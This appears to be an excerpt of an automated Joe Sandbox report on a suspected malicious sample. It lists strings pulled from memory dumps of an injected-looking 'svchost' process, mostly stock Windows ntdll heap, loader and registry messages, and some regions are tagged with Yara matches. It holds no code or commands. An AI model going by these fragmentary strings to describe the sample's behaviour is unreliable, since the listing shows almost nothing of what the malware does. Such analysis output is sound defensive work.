                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03BA22B6
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 03BA21DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                              • API String ID: 0-2586055223
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                              • API String ID: 0-336120773
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                              • API String ID: 0-1391187441
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B43255
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03B4327D
                                                                                                              • HEAP: , xrefs: 03B43264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B31712
                                                                                                              • HEAP: , xrefs: 03B31596
                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03B31728
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                              • API String ID: 0-1145731471
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                              • API String ID: 0-2391371766
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                              • API String ID: 0-318774311
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %$&$@
                                                                                                              • API String ID: 0-1537733988
                                                                                                              Strings
                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03C0B82A
                                                                                                              • GlobalizationUserSettings, xrefs: 03C0B834
                                                                                                              • TargetNtPath, xrefs: 03C0B82F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                              • API String ID: 0-505981995
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B8E6A6
                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03B8E6C6
                                                                                                              • HEAP: , xrefs: 03B8E6B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                              • API String ID: 0-1340214556
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03BDDC12
                                                                                                              • HEAP: , xrefs: 03BDDC1F
                                                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03BDDC32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                              • API String ID: 0-3815128232
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03BA82E8
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 03BA82D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 03BA82DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              Strings
                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03BA1B39
                                                                                                              • LdrpAllocateTls, xrefs: 03BA1B40
                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03BA1B4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                              • API String ID: 0-4274184382
                                                                                                              Strings
                                                                                                              • @, xrefs: 03BEC1F1
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03BEC1C5
                                                                                                              • PreferredUILanguages, xrefs: 03BEC212
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03BB4899
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03BB4888
                                                                                                              • LdrpCheckRedirection, xrefs: 03BB488F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              Strings
                                                                                                              • RtlCreateActivationContext, xrefs: 03BA29F9
                                                                                                              • Actx , xrefs: 03B633AC
                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 03BA29FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                              • API String ID: 0-859632880
                                                                                                              Strings
                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 03BA1A40
                                                                                                              • LdrpInitializeTls, xrefs: 03BA1A47
                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03BA1A51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                              • API String ID: 0-931879808
                                                                                                              Strings
                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03B7127B
                                                                                                              • BuildLabEx, xrefs: 03B7130F
                                                                                                              • @, xrefs: 03B712A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                              • API String ID: 0-3051831665
                                                                                                              Strings
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 03BB20F3
                                                                                                              • LdrpInitializationFailure, xrefs: 03BB20FA
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03BB2104
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugPrintTimes
                                                                                                              • String ID: kLsE
                                                                                                              • API String ID: 3446177414-3058123920
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@
                                                                                                              • API String ID: 0-149943524
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @4_w@4_w$PATH
                                                                                                              • API String ID: 0-1852745621
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              Strings
                                                                                                              • ResIdCount less than 2., xrefs: 03B8EEC9
                                                                                                              • Failed to retrieve service checksum., xrefs: 03B8EE56
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                              • API String ID: 0-863616075
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: gfff$S
                                                                                                              • API String ID: 0-689075547
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: -{$GR
                                                                                                              • API String ID: 0-1179925523
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: VUUU$gfff
                                                                                                              • API String ID: 0-2662692612
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: yxxx$d
                                                                                                              • API String ID: 0-2460085974
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$
                                                                                                              • API String ID: 0-233714265
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 03B3A2FB
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 03B3A309
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local\$@
                                                                                                              • API String ID: 0-380025441
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P`MwRbMw
                                                                                                              • API String ID: 0-3798419607
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: I_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-3634609715
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (
                                                                                                              • API String ID: 0-3887548279
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (
                                                                                                              • API String ID: 0-3887548279
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: I_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-3634609715
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 04_w04_wI_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-4217632228
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              Strings
                                                                                                              Memory Dump Source
